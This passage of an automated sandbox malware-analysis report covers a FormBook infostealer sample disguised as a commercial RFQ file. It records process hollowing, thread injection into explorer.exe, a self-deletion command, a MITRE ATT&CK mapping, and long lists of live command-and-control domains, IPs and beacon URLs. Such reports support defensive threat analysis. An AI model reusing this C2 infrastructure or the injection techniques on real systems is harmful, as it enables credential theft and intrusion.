      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 0_2_00403A41 SetWindowPos,ShowWindow,DestroyWindow,SetWindowLongA,GetDlgItem,SendMessageA,IsWindowEnabled,SendMessageA,GetDlgItem,LdrInitializeThunk,GetDlgItem,GetDlgItem,SetClassLongA,LdrInitializeThunk,SendMessageA,LdrInitializeThunk,LdrInitializeThunk,GetDlgItem,ShowWindow,KiUserCallbackDispatcher,EnableWindow,LdrInitializeThunk,GetSystemMenu,EnableMenuItem,SendMessageA,LdrInitializeThunk,SendMessageA,SendMessageA,lstrlenA,SetWindowTextA,DestroyWindow,CreateDialogParamA,GetDlgItem,GetWindowRect,ScreenToClient,SetWindowPos,ShowWindow,DestroyWindow,EndDialog,ShowWindow,0_2_00403A41

      HIPS / PFW / Operating System Protection Evasion

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 185.53.179.91 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 18.225.33.210 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 154.205.111.163 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 31.31.198.61 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 92.205.50.73 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.123 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 104.21.6.57 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 150.95.255.38 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 203.161.56.237 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 85.10.194.228 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.3 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 76.223.26.96 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.212 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 43.154.67.170 80Jump to behavior
      Sample uses process hollowing technique
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeSection unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: DE0000Jump to behavior
      Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Queues an APC in another process (thread injection)
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeThread register set: target process: 5284Jump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exeThread register set: target process: 5284Jump to behavior
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeProcess created: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeJump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe"Jump to behavior
      Source: explorer.exe, 00000004.00000000.11511725734.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.16258676507.0000000000D00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000004.00000002.16281521340.000000000C9C5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11511725734.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.11530960876.000000000C9C5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000004.00000000.11511725734.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.16258676507.0000000000D00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000004.00000002.16256465760.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11509900048.00000000005B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman[
      Source: explorer.exe, 00000004.00000000.11511725734.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.16258676507.0000000000D00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 0_2_00405D51 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D51

      Stealing of Sensitive Information

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000005.00000002.16258753847.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.11593239908.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.16257135641.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.16256466940.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.11592927755.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000005.00000002.16258753847.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.11593239908.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.16257135641.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.16256466940.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.11592927755.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts1
      Native API      		1
      DLL Side-Loading      		1
      Access Token Manipulation      		1
      Rootkit      		1
      Credential API Hooking      		221
      Security Software Discovery      		Remote Services1
      Credential API Hooking      		Exfiltration Over Other Network Medium11
      Encrypted Channel      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      System Shutdown/Reboot
      Default Accounts1
      Shared Modules      		Boot or Logon Initialization Scripts512
      Process Injection      		1
      Masquerading      		LSASS Memory12
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Archive Collected Data      		Exfiltration Over Bluetooth3
      Ingress Tool Transfer      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)1
      DLL Side-Loading      		12
      Virtualization/Sandbox Evasion      		Security Account Manager2
      Process Discovery      		SMB/Windows Admin Shares1
      Clipboard Data      		Automated Exfiltration3
      Non-Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
      Access Token Manipulation      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput CaptureScheduled Transfer114
      Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script512
      Process Injection      		LSA Secrets2
      File and Directory Discovery      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common1
      Deobfuscate/Decode Files or Information      		Cached Domain Credentials3
      System Information Discovery      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items2
      Obfuscated Files or Information      		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
      DLL Side-Loading      		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1295687 Sample: RFQINL0607_Commerical_list.exe Startdate: 23/08/2023 Architecture: WINDOWS Score: 100 32 zentrimax.com 2->32 34 www.zentrimax.com 2->34 36 26 other IPs or domains 2->36 56 Snort IDS alert for network traffic 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 7 other signatures 2->62 11 RFQINL0607_Commerical_list.exe 1 40 2->11         started        signatures3 process4 file5 30 C:\Users\user\AppData\Local\...\System.dll, PE32 11->30 dropped 70 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->70 72 Tries to detect Any.run 11->72 15 RFQINL0607_Commerical_list.exe 6 11->15         started        signatures6 process7 dnsIp8 44 drive.google.com 142.250.185.110, 443, 49921 GOOGLEUS United States 15->44 46 googlehosted.l.googleusercontent.com 172.217.18.97, 443, 49922 GOOGLEUS United States 15->46 48 Modifies the context of a thread in another process (thread injection) 15->48 50 Tries to detect Any.run 15->50 52 Maps a DLL or memory area into another process 15->52 54 2 other signatures 15->54 19 explorer.exe 3 1 15->19 injected signatures9 process10 dnsIp11 38 www.rtuakl.xyz 203.161.56.237, 49945, 80 VNPT-AS-VNVNPTCorpVN Malaysia 19->38 40 www.pingpongtable-sg.bond 185.53.179.91, 49938, 80 TEAMINTERNET-ASDE Germany 19->40 42 13 other IPs or domains 19->42 64 System process connects to network (likely due to code injection or exploit) 19->64 23 colorcpl.exe 19->23         started        signatures12 process13 signatures14 66 Modifies the context of a thread in another process (thread injection) 23->66 68 Maps a DLL or memory area into another process 23->68 26 cmd.exe 1 23->26         started        process15 process16 28 conhost.exe 26->28         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      RFQINL0607_Commerical_list.exe21%VirustotalBrowse
      RFQINL0607_Commerical_list.exe8%ReversingLabs

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      www.mtotem.online1%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://www.kmxbcx.xyzReferer:0%Avira URL Cloudsafe
      http://www.luckymotherclucker.comReferer:0%Avira URL Cloudsafe
      https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
      http://www.kmxbcx.xyz/fg83/www.mtotem.online0%Avira URL Cloudsafe
      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
      http://www.lido.systems/fg83/www.ngbjf.cyou0%Avira URL Cloudsafe
      http://www.rtuakl.xyzReferer:0%Avira URL Cloudsafe
      http://www.r5fesgy.com/fg83/www.lido.systems0%Avira URL Cloudsafe
      http://www.7sdide.xyz/fg83/www.ballbucketssalesstore.com100%Avira URL Cloudphishing
      http://www.aitechscope.com/fg83/www.gewep.cloud0%Avira URL Cloudsafe
      http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
      http://www.shebyoaksmovie.com/fg83/?IpZXsVy=+mA0FlUcSz8uL7OKJNWfW2ZlgbXAiWHV5u0VTdt0L7UZP0MWfugFcx8oc6pDvqcBHwu4&kxopsN=MlyXbd0X0%Avira URL Cloudsafe
      http://www.telefonino.shop/fg83/100%Avira URL Cloudmalware
      http://www.rtuakl.xyz/fg83/www.shebyoaksmovie.com100%Avira URL Cloudphishing
      http://www.luckymotherclucker.com0%Avira URL Cloudsafe
      http://www.lido.systemsReferer:0%Avira URL Cloudsafe
      http://www.ballbucketssalesstore.com/fg83/0%Avira URL Cloudsafe
      http://www.ballbucketssalesstore.comReferer:0%Avira URL Cloudsafe
      http://www.ballbucketssalesstore.com/fg83/www.pingpongtable-sg.bond0%Avira URL Cloudsafe
      http://www.shebyoaksmovie.com0%Avira URL Cloudsafe
      http://www.kmxbcx.xyz/fg83/0%Avira URL Cloudsafe
      http://www.ngbjf.cyou/fg83/www.visionaryglobalconsulting.com0%Avira URL Cloudsafe
      http://www.pingpongtable-sg.bondReferer:0%Avira URL Cloudsafe
      http://www.ballbucketssalesstore.com/fg83/?kxopsN=MlyXbd0X&IpZXsVy=7beFqJnGqWKAzf+YtrCM1R0h2XEeEfVRhbTn4ULJnEu/U/SD/89uYryM33AUZhPPBj1C0%Avira URL Cloudsafe
      http://www.nrodwukb.clickReferer:0%Avira URL Cloudsafe
      http://www.gewep.cloud/fg83/www.telefonino.shop0%Avira URL Cloudsafe
      http://www.rtuakl.xyz/fg83/?1b_Pr=C88x5r&IpZXsVy=NXNQizsPdhk7hM3DdL+UWbtauAqc3n1MPcjBQKiLiZ9eGnsQShpdzroL71dVCx/hnsce100%Avira URL Cloudphishing
      http://www.7sdide.xyzReferer:0%Avira URL Cloudsafe
      http://www.7sdide.xyz100%Avira URL Cloudphishing
      http://www.sfaiqhwxebvtre.net/fg83/www.rtuakl.xyz0%Avira URL Cloudsafe
      http://www.sfaiqhwxebvtre.netReferer:0%Avira URL Cloudsafe
      http://www.rtuakl.xyz/fg83/www.r5fesgy.com100%Avira URL Cloudphishing
      http://www.telefonino.shop/fg83/www.zentrimax.com100%Avira URL Cloudmalware
      http://www.sanlimarket.com0%Avira URL Cloudsafe
      http://www.deyuming.icu/fg83/www.7sdide.xyz0%Avira URL Cloudsafe
      http://www.7sdide.xyz/fg83/100%Avira URL Cloudphishing
      www.ddh979.com/fg83/0%Avira URL Cloudsafe
      http://www.cryptor.store/fg83/0%Avira URL Cloudsafe
      http://www.kmxbcx.xyz0%Avira URL Cloudsafe
      http://www.telefonino.shop100%Avira URL Cloudmalware
      http://www.luckymotherclucker.com/fg83/0%Avira URL Cloudsafe
      http://www.aitechscope.com0%Avira URL Cloudsafe
      http://www.cryptor.storeReferer:0%Avira URL Cloudsafe
      https://word.office.comt.0%Avira URL Cloudsafe
      http://www.nrodwukb.click/fg83/www.deyuming.icu0%Avira URL Cloudsafe
      http://www.nrodwukb.click/fg83/0%Avira URL Cloudsafe
      http://www.r5fesgy.comReferer:0%Avira URL Cloudsafe
      http://www.r5fesgy.com/fg83/?IpZXsVy=Mrfpj9Lscj+lGsorq1+NGtecW7+GotfegZgYdt6juanfgo0fmIEP17Z154I/86DF7ZrT&1b_Pr=C88x5r0%Avira URL Cloudsafe
      http://www.nrodwukb.click/fg83/?IpZXsVy=SC/iCgFLVXNGeXCdvfSQQa0Pnk4CAUJ5O5Rqv1EukQPQaC7CZmx4daunLr1tFIMbtKb4&kxopsN=MlyXbd0X0%Avira URL Cloudsafe
      http://www.pingpongtable-sg.bond/fg83/www.rtuakl.xyz0%Avira URL Cloudsafe
      http://www.zentrimax.com/fg83/www.luckymotherclucker.com0%Avira URL Cloudsafe
      http://www.sfaiqhwxebvtre.net0%Avira URL Cloudsafe
      http://www.ngbjf.cyou/fg83/?IpZXsVy=AfWx5BM5NEDLLjiDiXzoNqwgCc8LDH2xQfiELIIrQmIg7de8Ug2fD1PTSOtTZsGWy/y0&1b_Pr=C88x5r0%Avira URL Cloudsafe
      http://www.quovadis.bm00%Avira URL Cloudsafe
      http://www.telefonino.shop/fg83/?kxopsN=MlyXbd0X&IpZXsVy=6qxxm/Myx8P+pgfcTInzw0qSPJTBsSTIKigtmaaw24rUvouFUh5mZ96ocSMrLiBbFzYo100%Avira URL Cloudmalware
      http://www.cryptor.store/fg83/www.sfaiqhwxebvtre.net0%Avira URL Cloudsafe
      http://www.r5fesgy.com/fg83/0%Avira URL Cloudsafe
      http://www.zentrimax.com/fg83/?IpZXsVy=02BfcyhJkHSWiCynkOFfJGJebC0YFa9k1Fy3MEzZL5gnqTIU5GtxmB+WNcUmplxHMKNA&kxopsN=MlyXbd0X0%Avira URL Cloudsafe
      http://www.aitechscope.com/fg83/0%Avira URL Cloudsafe
      http://schemas.m0%Avira URL Cloudsafe
      http://www.zentrimax.comReferer:0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      www.pingpongtable-sg.bond
      		185.53.179.91
      		truetrue
        		unknown
        342284.parkingcrew.net
        		76.223.26.96
        		truefalse
          		high
          www.ballbucketssalesstore.com
          		188.114.97.3
          		truetrue
            		unknown
            www.lido.systems
            		92.205.50.73
            		truetrue
              		unknown
              parkingpage.namecheap.com
              		198.54.117.212
              		truefalse
                		high
                zentrimax.com
                		85.10.194.228
                		truetrue
                  		unknown
                  www.mtotem.online
                  		31.31.198.61
                  		truetrueunknown
                  www.nrodwukb.click
                  		43.154.67.170
                  		truetrue
                    		unknown
                    www.ngbjf.cyou
                    		91.195.240.123
                    		truetrue
                      		unknown
                      www.sfaiqhwxebvtre.net
                      		150.95.255.38
                      		truetrue
                        		unknown
                        www.ddh979.com
                        		154.205.111.163
                        		truetrue
                          		unknown
                          www.telefonino.shop
                          		104.21.6.57
                          		truetrue
                            		unknown
                            drive.google.com
                            		142.250.185.110
                            		truefalse
                              		high
                              www.rtuakl.xyz
                              		203.161.56.237
                              		truetrue
                                		unknown
                                luckymotherclucker.com
                                		34.102.136.180
                                		truefalse
                                  		unknown
                                  googlehosted.l.googleusercontent.com
                                  		172.217.18.97
                                  		truefalse
                                    		high
                                    www.r5fesgy.com
                                    		18.225.33.210
                                    		truetrue
                                      		unknown
                                      doc-14-bk-docs.googleusercontent.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        www.aitechscope.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.deyuming.icu
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.7sdide.xyz
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.shebyoaksmovie.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.luckymotherclucker.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.kmxbcx.xyz
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.gewep.cloud
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.visionaryglobalconsulting.com
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.zentrimax.com
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.cryptor.store
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown

                                                            Contacted URLs

                                                            NameMaliciousAntivirus DetectionReputation
                                                            http://www.shebyoaksmovie.com/fg83/?IpZXsVy=+mA0FlUcSz8uL7OKJNWfW2ZlgbXAiWHV5u0VTdt0L7UZP0MWfugFcx8oc6pDvqcBHwu4&kxopsN=MlyXbd0Xtrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.rtuakl.xyz/fg83/?1b_Pr=C88x5r&IpZXsVy=NXNQizsPdhk7hM3DdL+UWbtauAqc3n1MPcjBQKiLiZ9eGnsQShpdzroL71dVCx/hnscetrue
                                                            • Avira URL Cloud: phishing
                                                            		unknown
                                                            http://www.ballbucketssalesstore.com/fg83/?kxopsN=MlyXbd0X&IpZXsVy=7beFqJnGqWKAzf+YtrCM1R0h2XEeEfVRhbTn4ULJnEu/U/SD/89uYryM33AUZhPPBj1Ctrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            www.ddh979.com/fg83/true
                                                            • Avira URL Cloud: safe
                                                            		low
                                                            https://doc-14-bk-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/si1abd4ulvss7tcohtsfs7v3penv9eff/1692775725000/09097082265029608041/*/1ZxodEIl11x1kvePl-a7TaaxTL5A6DR79?e=download&uuid=29b6be65-76dc-43bd-aef7-44538726e87dfalse
                                                              		high
                                                              http://www.nrodwukb.click/fg83/?IpZXsVy=SC/iCgFLVXNGeXCdvfSQQa0Pnk4CAUJ5O5Rqv1EukQPQaC7CZmx4daunLr1tFIMbtKb4&kxopsN=MlyXbd0Xtrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.r5fesgy.com/fg83/?IpZXsVy=Mrfpj9Lscj+lGsorq1+NGtecW7+GotfegZgYdt6juanfgo0fmIEP17Z154I/86DF7ZrT&1b_Pr=C88x5rtrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.ngbjf.cyou/fg83/?IpZXsVy=AfWx5BM5NEDLLjiDiXzoNqwgCc8LDH2xQfiELIIrQmIg7de8Ug2fD1PTSOtTZsGWy/y0&1b_Pr=C88x5rtrue
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.telefonino.shop/fg83/?kxopsN=MlyXbd0X&IpZXsVy=6qxxm/Myx8P+pgfcTInzw0qSPJTBsSTIKigtmaaw24rUvouFUh5mZ96ocSMrLiBbFzYotrue
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.zentrimax.com/fg83/?IpZXsVy=02BfcyhJkHSWiCynkOFfJGJebC0YFa9k1Fy3MEzZL5gnqTIU5GtxmB+WNcUmplxHMKNA&kxopsN=MlyXbd0Xtrue
                                                              • Avira URL Cloud: safe
                                                              		unknown

                                                              URLs from Memory and Binaries

                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              http://www.kmxbcx.xyz/fg83/www.mtotem.onlineexplorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.msn.com/de-de/sport/motorsport/motogp/renn-kalenderexplorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.7sdide.xyz/fg83/www.ballbucketssalesstore.comexplorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: phishing
                                                                		unknown
                                                                http://www.luckymotherclucker.comReferer:explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JgArPAA=/Condition/AAehyQC.svgexplorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.msn.com/de-de/finanzen/top-stories/zahlreiche-deutsche-autos-auf-havarierter-fremantle-hexplorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.kmxbcx.xyzReferer:explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000004.00000003.12983429238.0000000009271000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.11520300348.0000000009240000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12980663330.0000000009240000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16271947395.0000000009272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.msn.com/de-de/sport/fussball/soccer-international-world-cup-womenexplorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.RFQINL0607_Commerical_list.exe, 00000002.00000001.11412040635.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.aitechscope.com/fg83/www.gewep.cloudexplorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.lido.systems/fg83/www.ngbjf.cyouexplorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.rtuakl.xyzReferer:explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://www.msn.com/de-de/lifestyle/leben/keine-guten-ausssichen-4-sternzeichen-erwartet-ein-schwereexplorer.exe, 00000004.00000000.11520300348.0000000008FE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16268124194.0000000008FE2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.r5fesgy.com/fg83/www.lido.systemsexplorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://deff.nelreports.net/api/report?cat=msnexplorer.exe, 00000004.00000000.11509900048.00000000005D3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16256465760.00000000005D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.ballbucketssalesstore.com/fg83/www.pingpongtable-sg.bondexplorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.rtuakl.xyz/fg83/www.shebyoaksmovie.comexplorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.16294165706.000000000FE1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: phishing
                                                                          		unknown
                                                                          http://www.telefonino.shop/fg83/explorer.exe, 00000004.00000003.11773576168.000000000FE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11771868943.000000000FDCC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
